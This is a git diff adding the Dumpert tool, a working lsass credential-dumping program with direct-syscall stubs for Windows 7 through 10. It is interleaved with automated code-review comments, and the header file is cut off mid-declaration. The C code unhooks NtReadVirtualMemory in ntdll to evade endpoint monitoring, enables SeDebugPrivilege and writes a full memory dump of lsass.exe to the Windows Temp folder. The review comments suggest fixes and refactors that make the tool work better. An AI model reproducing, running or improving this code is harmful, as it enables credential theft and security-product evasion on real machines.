diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj
new file mode 100755
index 0000000..7d27878
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj
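Review bot: The eight syscall function pointers from `NTSTATUS(*NtAllocateVirtualMemory)(...)` down to `NTSTATUS(*ZwClose)(...)` in this hunk are object definitions, not declarations, living in a header; with Dumpert.c as the only includer this links, but any second translation unit that includes Dumpert.h would produce duplicate-symbol errors. Declare them `extern` here and define them once in Dumpert.c, or make them `static` if they are meant to be per-file. The ZwWriteVirtualMemory prototypes name their size parameters `NumberOfBytesToRead`/`NumberOfBytesRead`, which reads as a copy of the NtReadVirtualMemory signature; `NumberOfBytesToWrite`/`NumberOfBytesWritten` would match what the call does. A one-line comment on `ULONG Reserved1[6];` saying which documented SYSTEM_PROCESS_INFORMATION fields it stands in for (and that the layout is the x64 one) would spare the next reader from re-deriving the offsets that GetPID depends on.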
@@ -0,0 +1,128 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + {307088B9-2992-4DE7-A57D-9E657B1CE546} + OutflankDumpertDLL + 8.1 + + + + Application + true + v140 + MultiByte + + + Application + false + v140 + true + MultiByte + + + DynamicLibrary + true + v140 + MultiByte + + + DynamicLibrary + false + v140 + true + MultiByte + + + + + + + + + + + + + + + + + + + + + + + + Level3 + Disabled + true + + + + + Level3 + Disabled + true + + + + + Level3 + MaxSpeed + true + true + true + + + true + true + + + + + Level3 + MaxSpeed + true + true + true + MultiThreaded + + + true + true + false + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.filters b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.filters new file mode 100755 index 0000000..68698c6 --- /dev/null +++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.filters @@ -0,0 +1,32 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + + + Header Files + + + + + Source Files + + + \ No newline at end of file diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.user b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.user new file mode 100755 index 0000000..a4836ea --- /dev/null +++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.user @@ -0,0 +1,8 @@ + + + + C:\Windows\System32\Rundll32.exe + C:\Outflank\Development\Outflank-Dumpert-DLL\x64\Debug\Outflank-Dumpert-DLL.dll,Dump + WindowsLocalDebugger + + \ No newline at end of file 
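Review bot: Outflank-Dumpert-DLL.vcxproj.user in this line is a per-developer Visual Studio settings file and carries a machine-local path (`C:\Outflank\Development\Outflank-Dumpert-DLL\x64\Debug\...`) as the rundll32 debug command; it should not be tracked. Drop it from the commit and add `*.vcxproj.user` to .gitignore, keeping the `rundll32.exe <dll>,Dump` launch line in the project README instead if it is meant as usage documentation.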
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Syscalls.asm b/Dumpert-DLL/Outflank-Dumpert-DLL/Syscalls.asm
new file mode 100755
index 0000000..86381b9
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Syscalls.asm
@@ -0,0 +1,237 @@
+.code
+
+; Reference: https://j00ru.vexillium.org/syscalls/nt/64/
+
+; Windows 7 SP1 / Server 2008 R2 specific syscalls
+
+ZwOpenProcess7SP1 proc
+ mov r10, rcx
+ mov eax, 23h
+ syscall
+ ret
+ZwOpenProcess7SP1 endp
+
+ZwClose7SP1 proc
+ mov r10, rcx
+ mov eax, 0Ch
+ syscall
+ ret
+ZwClose7SP1 endp
+
+ZwWriteVirtualMemory7SP1 proc
+ mov r10, rcx
+ mov eax, 37h
+ syscall
+ ret
+ZwWriteVirtualMemory7SP1 endp
+
+ZwProtectVirtualMemory7SP1 proc
+ mov r10, rcx
+ mov eax, 4Dh
+ syscall
+ ret
+ZwProtectVirtualMemory7SP1 endp
+
+ZwQuerySystemInformation7SP1 proc
+ mov r10, rcx
+ mov eax, 33h
+ syscall
+ ret
+ZwQuerySystemInformation7SP1 endp
+
+NtAllocateVirtualMemory7SP1 proc
+ mov r10, rcx
+ mov eax, 15h
+ syscall
+ ret
+NtAllocateVirtualMemory7SP1 endp
+
+NtFreeVirtualMemory7SP1 proc
+ mov r10, rcx
+ mov eax, 1Bh
+ syscall
+ ret
+NtFreeVirtualMemory7SP1 endp
+
+NtCreateFile7SP1 proc
+ mov r10, rcx
+ mov eax, 52h
+ syscall
+ ret
+NtCreateFile7SP1 endp
+
+; Windows 8 / Server 2012 specific syscalls
+
+ZwOpenProcess80 proc
+ mov r10, rcx
+ mov eax, 24h
+ syscall
+ ret
+ZwOpenProcess80 endp
+
+ZwClose80 proc
+ mov r10, rcx
+ mov eax, 0Dh
+ syscall
+ ret
+ZwClose80 endp
+
+ZwWriteVirtualMemory80 proc
+ mov r10, rcx
+ mov eax, 38h
+ syscall
+ ret
+ZwWriteVirtualMemory80 endp
+
+ZwProtectVirtualMemory80 proc
+ mov r10, rcx
+ mov eax, 4Eh
+ syscall
+ ret
+ZwProtectVirtualMemory80 endp
+
+ZwQuerySystemInformation80 proc
+ mov r10, rcx
+ mov eax, 34h
+ syscall
+ ret
+ZwQuerySystemInformation80 endp
+
+NtAllocateVirtualMemory80 proc
+ mov r10, rcx
+ mov eax, 16h
+ syscall
+ ret
+NtAllocateVirtualMemory80 endp
+
+NtFreeVirtualMemory80 proc
+ mov r10, rcx
+ mov eax, 1Ch
+ syscall
+ ret
+NtFreeVirtualMemory80 endp
+
+NtCreateFile80 proc
+ mov r10, rcx
+ mov eax, 53h
+ syscall
+ ret
+NtCreateFile80 endp
+
+; Windows 8.1 / Server 2012 R2 specific syscalls
+
+ZwOpenProcess81 proc
+ mov r10, rcx
+ mov eax, 25h
+ syscall
+ ret
+ZwOpenProcess81 endp
+
+ZwClose81 proc
+ mov r10, rcx
+ mov eax, 0Eh
+ syscall
+ ret
+ZwClose81 endp
+
+ZwWriteVirtualMemory81 proc
+ mov r10, rcx
+ mov eax, 39h
+ syscall
+ ret
+ZwWriteVirtualMemory81 endp
+
+ZwProtectVirtualMemory81 proc
+ mov r10, rcx
+ mov eax, 4Fh
+ syscall
+ ret
+ZwProtectVirtualMemory81 endp
+
+ZwQuerySystemInformation81 proc
+ mov r10, rcx
+ mov eax, 35h
+ syscall
+ ret
+ZwQuerySystemInformation81 endp
+
+NtAllocateVirtualMemory81 proc
+ mov r10, rcx
+ mov eax, 17h
+ syscall
+ ret
+NtAllocateVirtualMemory81 endp
+
+NtFreeVirtualMemory81 proc
+ mov r10, rcx
+ mov eax, 1Dh
+ syscall
+ ret
+NtFreeVirtualMemory81 endp
+
+NtCreateFile81 proc
+ mov r10, rcx
+ mov eax, 54h
+ syscall
+ ret
+NtCreateFile81 endp
+
+; Windows 10 / Server 2016 specific syscalls
+
+ZwOpenProcess10 proc
+ mov r10, rcx
+ mov eax, 26h
+ syscall
+ ret
+ZwOpenProcess10 endp
+
+ZwClose10 proc
+ mov r10, rcx
+ mov eax, 0Fh
+ syscall
+ ret
+ZwClose10 endp
+
+ZwWriteVirtualMemory10 proc
+ mov r10, rcx
+ mov eax, 3Ah
+ syscall
+ ret
+ZwWriteVirtualMemory10 endp
+
+ZwProtectVirtualMemory10 proc
+ mov r10, rcx
+ mov eax, 50h
+ syscall
+ ret
+ZwProtectVirtualMemory10 endp
+
+ZwQuerySystemInformation10 proc
+ mov r10, rcx
+ mov eax, 36h
+ syscall
+ ret
+ZwQuerySystemInformation10 endp
+
+NtAllocateVirtualMemory10 proc
+ mov r10, rcx
+ mov eax, 18h
+ syscall
+ ret
+NtAllocateVirtualMemory10 endp
+
+NtFreeVirtualMemory10 proc
+ mov r10, rcx
+ mov eax, 1Eh
+ syscall
+ ret
+NtFreeVirtualMemory10 endp
+
+NtCreateFile10 proc
+ mov r10, rcx
+ mov eax, 55h
+ syscall
+ ret
+NtCreateFile10 endp
+
+end
diff --git a/Dumpert/Outflank-Dumpert.sln b/Dumpert/Outflank-Dumpert.sln
new file mode 100755
index 0000000..9f2a4ff
--- /dev/null
+++ b/Dumpert/Outflank-Dumpert.sln
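Review bot: Each stub in this hunk hard-codes one service number per OS generation, and the Windows 10 set is selected in Dumpert.c by the "10.0" version string alone, so any later build that still reports 10.0 but whose service table differs would execute a different system service with the caller's arguments; the stubs carry no guard and no record of which builds the numbers were checked against. A comment at the top of each section, e.g. `; numbers taken from the j00ru table for the builds tested; re-verify before adding an OS branch`, would make that assumption explicit for whoever adds the next version. Stylistically the 32 procedures differ only in name and immediate, so a MASM macro removes the repetition and turns a wrong number into a one-line change instead of a six-line one.

```asm
SYSCALL_STUB macro name, nr
name proc
    mov r10, rcx
    mov eax, nr
    syscall
    ret
name endp
endm

; Windows 7 SP1 / Server 2008 R2 specific syscalls
SYSCALL_STUB ZwOpenProcess7SP1, 23h
SYSCALL_STUB ZwClose7SP1, 0Ch
; … unchanged: remaining stubs, one SYSCALL_STUB line each with the same numbers …
```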
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 14 for Windows Desktop
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert", "Outflank-Dumpert\Outflank-Dumpert.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64
+ {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64
+ {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32
+ {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32
+ {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64
+ {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64
+ {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32
+ {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/Dumpert/Outflank-Dumpert/Dumpert.c b/Dumpert/Outflank-Dumpert/Dumpert.c
new file mode 100755
index 0000000..4539513
--- /dev/null
+++ b/Dumpert/Outflank-Dumpert/Dumpert.c
@@ -0,0 +1,354 @@ +#undef _UNICODE +#define _UNICODE +#undef UNICODE +#define UNICODE + +#include +#include +#include "Dumpert.h" +#include + +#pragma comment (lib, "Dbghelp.lib") + + +BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { + BYTE AssemblyBytes[] = {0x4C, 0x8B, 0xD1, 0xB8, 0xFF}; + + if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) { + AssemblyBytes[4] = pWinVerInfo->SystemCall; + ZwWriteVirtualMemory = &ZwWriteVirtualMemory10; + ZwProtectVirtualMemory = &ZwProtectVirtualMemory10; + } + else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) { + AssemblyBytes[4] = pWinVerInfo->SystemCall; + ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1; + ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1; + } + else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) { + AssemblyBytes[4] = pWinVerInfo->SystemCall; + ZwWriteVirtualMemory = &ZwWriteVirtualMemory80; + ZwProtectVirtualMemory = &ZwProtectVirtualMemory80; + } + else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) { + AssemblyBytes[4] = pWinVerInfo->SystemCall; + ZwWriteVirtualMemory = &ZwWriteVirtualMemory81; + ZwProtectVirtualMemory = &ZwProtectVirtualMemory81; + } + else { + return FALSE; + } + + LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall); + + printf(" [+] %s function pointer at: 0x%p\n", pWinVerInfo->lpApiCall, lpProcAddress); + printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]); + printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall); + + ULONG OldProtection, NewProtection; + SIZE_T uSize = 10; + NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); + if (status != STATUS_SUCCESS) { + wprintf(L" [!] 
ZwProtectVirtualMemory failed.\n"); + return FALSE; + } + + status = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL); + if (status != STATUS_SUCCESS) { + wprintf(L" [!] ZwWriteVirtualMemory failed.\n"); + return FALSE; + } + + status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection); + if (status != STATUS_SUCCESS) { + wprintf(L" [!] ZwProtectVirtualMemory failed.\n"); + return FALSE; + } + + return TRUE; +} + +BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) { + pWinVerInfo->hTargetPID = NULL; + + if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) { + ZwQuerySystemInformation = &ZwQuerySystemInformation10; + NtAllocateVirtualMemory = &NtAllocateVirtualMemory10; + NtFreeVirtualMemory = &NtFreeVirtualMemory10; + } + else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) { + ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1; + NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1; + NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1; + } + else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) { + ZwQuerySystemInformation = &ZwQuerySystemInformation80; + NtAllocateVirtualMemory = &NtAllocateVirtualMemory80; + NtFreeVirtualMemory = &NtFreeVirtualMemory80; + } + else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) { + ZwQuerySystemInformation = &ZwQuerySystemInformation81; + NtAllocateVirtualMemory = &NtAllocateVirtualMemory81; + NtFreeVirtualMemory = &NtFreeVirtualMemory81; + } + else { + return FALSE; + } + + ULONG uReturnLength = 0; + NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength); + if (!status == 0xc0000004) { + return FALSE; + } + + LPVOID pBuffer = NULL; + SIZE_T uSize = uReturnLength; + status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE); + if (status != 0) { + return FALSE; + } + + status = 
ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength); + if (status != 0) { + return FALSE; + } + + _RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString) + GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString"); + if (RtlEqualUnicodeString == NULL) { + return FALSE; + } + + PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer; + do { + if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) { + pWinVerInfo->hTargetPID = pProcInfo->ProcessId; + break; + } + pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta); + + } while (pProcInfo); + + status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE); + + if (pWinVerInfo->hTargetPID == NULL) { + return FALSE; + } + + return TRUE; +} + +BOOL IsElevated() { + BOOL fRet = FALSE; + HANDLE hToken = NULL; + if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { + TOKEN_ELEVATION Elevation = { 0 }; + DWORD cbSize = sizeof(TOKEN_ELEVATION); + if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) { + fRet = Elevation.TokenIsElevated; + } + } + if (hToken) { + CloseHandle(hToken); + } + return fRet; +} + +BOOL SetDebugPrivilege() { + HANDLE hToken = NULL; + TOKEN_PRIVILEGES TokenPrivileges = { 0 }; + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) { + return FALSE; + } + + TokenPrivileges.PrivilegeCount = 1; + TokenPrivileges.Privileges[0].Attributes = TRUE ? 
SE_PRIVILEGE_ENABLED : 0; + + LPWSTR lpwPriv = L"SeDebugPrivilege"; + if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) { + CloseHandle(hToken); + return FALSE; + } + + if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) { + CloseHandle(hToken); + return FALSE; + } + + CloseHandle(hToken); + return TRUE; +} + + +int wmain(int argc, wchar_t* argv[]) { + wprintf(L" ________ __ _____.__ __ \n"); + wprintf(L" \\_____ \\ __ ___/ |__/ ____\\ | _____ ____ | | __ \n"); + wprintf(L" / | \\| | \\ __\\ __\\| | \\__ \\ / \\| |/ / \n"); + wprintf(L" / | \\ | /| | | | | |__/ __ \\| | \\ < \n"); + wprintf(L" \\_______ /____/ |__| |__| |____(____ /___| /__|_ \\ \n"); + wprintf(L" \\/ \\/ \\/ \\/ \n"); + wprintf(L" Dumpert \n"); + wprintf(L" By Cneeliz @Outflank 2019 \n\n"); + + LPCWSTR lpwProcName = L"lsass.exe"; + + if (sizeof(LPVOID) != 8) { + wprintf(L"[!] Sorry, this tool only works on a x64 version of Windows.\n"); + exit(1); + } + + if (!IsElevated()) { + wprintf(L"[!] You need elevated privileges to run this tool!\n"); + exit(1); + } + + SetDebugPrivilege(); + + PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO)); + + // First set OS Version/Architecture specific values + OSVERSIONINFOEXW osInfo; + LPWSTR lpOSVersion; + osInfo.dwOSVersionInfoSize = sizeof(osInfo); + + _RtlGetVersion RtlGetVersion = (_RtlGetVersion) + GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); + if (RtlGetVersion == NULL) { + return FALSE; + } + + wprintf(L"[1] Checking OS version details:\n"); + RtlGetVersion(&osInfo); + swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); + pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber; + + // Now create os/build specific syscall function pointers. 
+ if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) { + lpOSVersion = L"10 or Server 2016"; + wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber); + wprintf(L" [+] Mapping version specific System calls.\n"); + ZwOpenProcess = &ZwOpenProcess10; + NtCreateFile = &NtCreateFile10; + ZwClose = &ZwClose10; + pWinVerInfo->SystemCall = 0x3F; + } + else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) { + lpOSVersion = L"7 SP1 or Server 2008 R2"; + wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber); + wprintf(L" [+] Mapping version specific System calls.\n"); + ZwOpenProcess = &ZwOpenProcess7SP1; + NtCreateFile = &NtCreateFile7SP1; + ZwClose = &ZwClose7SP1; + pWinVerInfo->SystemCall = 0x3C; + } + else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) { + lpOSVersion = L"8 or Server 2012"; + wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber); + wprintf(L" [+] Mapping version specific System calls.\n"); + ZwOpenProcess = &ZwOpenProcess80; + NtCreateFile = &NtCreateFile80; + ZwClose = &ZwClose80; + pWinVerInfo->SystemCall = 0x3D; + } + else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) { + lpOSVersion = L"8.1 or Server 2012 R2"; + wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber); + wprintf(L" [+] Mapping version specific System calls.\n"); + ZwOpenProcess = &ZwOpenProcess81; + NtCreateFile = &NtCreateFile81; + ZwClose = &ZwClose81; + pWinVerInfo->SystemCall = 0x3E; + } + else { + wprintf(L" [!] 
OS Version not supported.\n\n"); + exit(1); + } + + wprintf(L"[2] Checking Process details:\n"); + + _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString) + GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString"); + if (RtlInitUnicodeString == NULL) { + return FALSE; + } + + RtlInitUnicodeString(&pWinVerInfo->ProcName, lpwProcName); + + if (!GetPID(pWinVerInfo)) { + wprintf(L" [!] Enumerating process failed.\n"); + exit(1); + } + + wprintf(L" [+] Process ID of %wZ is: %lld\n", pWinVerInfo->ProcName, (ULONG64)pWinVerInfo->hTargetPID); + pWinVerInfo->lpApiCall = "NtReadVirtualMemory"; + + if (!Unhook_NativeAPI(pWinVerInfo)) { + printf(" [!] Unhooking %s failed.\n", pWinVerInfo->lpApiCall); + exit(1); + } + + wprintf(L"[3] Create memorydump file:\n"); + + wprintf(L" [+] Open a process handle.\n"); + HANDLE hProcess = NULL; + OBJECT_ATTRIBUTES ObjectAttributes; + InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); + CLIENT_ID uPid = { 0 }; + + uPid.UniqueProcess = pWinVerInfo->hTargetPID; + uPid.UniqueThread = (HANDLE)0; + + NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid); + if (hProcess == NULL) { + wprintf(L" [!] 
Failed to get processhandle.\n"); + exit(1); + } + + WCHAR chDmpFile[MAX_PATH] = L"\\??\\"; + WCHAR chWinPath[MAX_PATH]; + GetWindowsDirectory(chWinPath, MAX_PATH); + wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath); + wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp"); + + UNICODE_STRING uFileName; + RtlInitUnicodeString(&uFileName, chDmpFile); + + wprintf(L" [+] Dump %wZ memory to: %wZ\n", pWinVerInfo->ProcName, uFileName); + + HANDLE hDmpFile = NULL; + IO_STATUS_BLOCK IoStatusBlock; + ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock)); + OBJECT_ATTRIBUTES FileObjectAttributes; + InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL); + + // Open input file for writing, overwrite existing file. + status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0, + FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); + + if (hDmpFile == INVALID_HANDLE_VALUE) { + wprintf(L" [!] Failed to create dumpfile.\n"); + ZwClose(hProcess); + exit(1); + } + + DWORD dwTargetPID = GetProcessId(hProcess); + BOOL Success = MiniDumpWriteDump(hProcess, + dwTargetPID, + hDmpFile, + MiniDumpWithFullMemory, + NULL, + NULL, + NULL); + if ((!Success)) + { + wprintf(L" [!] Failed to create minidump, error code: %x\n", GetLastError()); + } + else { + wprintf(L" [+] Dump succesful.\n"); + } + + ZwClose(hDmpFile); + ZwClose(hProcess); + + return 0; +} \ No newline at end of file diff --git a/Dumpert/Outflank-Dumpert/Dumpert.h b/Dumpert/Outflank-Dumpert/Dumpert.h new file mode 100755 index 0000000..5034900 --- /dev/null +++ b/Dumpert/Outflank-Dumpert/Dumpert.h 
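Review bot: The failure check after NtCreateFile never fires, because NtCreateFile does not hand back INVALID_HANDLE_VALUE on failure (hDmpFile simply stays NULL, as initialised) and the returned status is discarded; test the status the way the rest of the file does, `if (status != STATUS_SUCCESS || hDmpFile == NULL) {`. The same kind of slip is in GetPID: `if (!status == 0xc0000004)` negates status before comparing, so the condition is always false and should read `if (status != 0xc0000004) {`. GetPID also leaks pBuffer on the two early returns that follow the NtAllocateVirtualMemory call, and the pWinVerInfo allocation in wmain is never freed; a single cleanup label at the end of each function would cover both. The two `return FALSE;` statements in wmain report exit status 0 on a failure, unlike the other error paths, which call exit(1).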
@@ -0,0 +1,209 @@ +#pragma once + +#include + +#define STATUS_SUCCESS 0 +#define OBJ_CASE_INSENSITIVE 0x00000040L +#define FILE_OVERWRITE_IF 0x00000005 +#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 +typedef LONG KPRIORITY; + +#define InitializeObjectAttributes( i, o, a, r, s ) { \ + (i)->Length = sizeof( OBJECT_ATTRIBUTES ); \ + (i)->RootDirectory = r; \ + (i)->Attributes = a; \ + (i)->ObjectName = o; \ + (i)->SecurityDescriptor = s; \ + (i)->SecurityQualityOfService = NULL; \ + } + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING, *PUNICODE_STRING; + +typedef const UNICODE_STRING* PCUNICODE_STRING; + +typedef struct _WIN_VER_INFO { + WCHAR chOSMajorMinor[8]; + DWORD dwBuildNumber; + UNICODE_STRING ProcName; + HANDLE hTargetPID; + LPCSTR lpApiCall; + INT SystemCall; +} WIN_VER_INFO, *PWIN_VER_INFO; + +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; + +typedef struct _CLIENT_ID { + HANDLE UniqueProcess; + HANDLE UniqueThread; +} CLIENT_ID, *PCLIENT_ID; + +typedef enum _SYSTEM_INFORMATION_CLASS { + SystemBasicInformation, + SystemProcessorInformation, + SystemPerformanceInformation, + SystemTimeOfDayInformation, + SystemPathInformation, + SystemProcessInformation, + SystemCallCountInformation, + SystemDeviceInformation, + SystemProcessorPerformanceInformation, + SystemFlagsInformation, + SystemCallTimeInformation, + SystemModuleInformation +} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; + +typedef struct _SYSTEM_PROCESSES { + ULONG NextEntryDelta; + ULONG ThreadCount; + ULONG Reserved1[6]; + LARGE_INTEGER CreateTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER KernelTime; + UNICODE_STRING ProcessName; + KPRIORITY BasePriority; + HANDLE ProcessId; + HANDLE InheritedFromProcessId; +} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES; 
+ +typedef struct _IO_STATUS_BLOCK +{ + union + { + LONG Status; + PVOID Pointer; + }; + ULONG Information; +} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; + + +// Windows 7 SP1 / Server 2008 R2 specific Syscalls +EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); +EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); +EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); +EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle); +EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); +EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); +EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID 